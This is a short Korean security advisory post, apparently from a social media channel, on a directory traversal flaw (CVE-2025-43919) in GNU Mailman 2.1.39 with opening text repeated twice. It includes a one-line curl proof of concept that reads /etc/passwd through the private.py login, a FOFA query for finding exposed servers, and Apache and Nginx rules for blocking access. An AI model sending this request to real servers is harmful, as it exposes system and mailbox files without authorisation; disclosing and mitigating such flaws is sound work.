
GNU Mailman 2.1.39(cPanel/WHM에 포함됨)에서 새로운 취약점이 발견되었습니다. 이 취약점은 인증되지 않은 원격 공격자가 디렉터리 트래버설 결함을 통해 서버의 임의 파일을 읽을 수 있게 합니다.
GNU Mailman 2.1.39(cPanel/WHM 번들 버전)에서 새로운 취약점이 발견되었습니다. 인증되지 않은 원격 공격자가 디렉토리 트래버설 결함을 통해 서버의 임의 파일을 읽을 수 있습니다.
📌 취약점 요약:
디렉토리 트래버설 (인증 불필요)private.py CGI 스크립트/mailman/private/mailman/etc/passwd, .mbox 아카이브, Mailman 설정 파일 등의 파일 공개5.8 (중간)CVE-2025-43919상태: 공식 패치 없음 (Mailman 2.1.x는 EOL)
🔥 개념 증명 (PoC):
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 악용 시나리오:
/etc/passwd, 설정 파일, 메일박스 파일 덤프🛡️ 완화 조치:
웹 서버 수준에서 /mailman/private에 대한 접근 차단:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
또는 Nginx에서:
location /mailman/private {
deny all;
return 403;
}
⬆️ Mailman 3.x — 2.x는 EOL이며 현대적인 보호 기능이 부족하므로 마이그레이션하세요
🔍 FOFA 쿼리 : app="Mailman"
📚 더 알아보고, 책임감 있게 공유하며, 인프라를 안전하게 유지하세요.
🔒 더 많은 실제 CVE, PoC, 강화 팁을 팔로우하세요: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity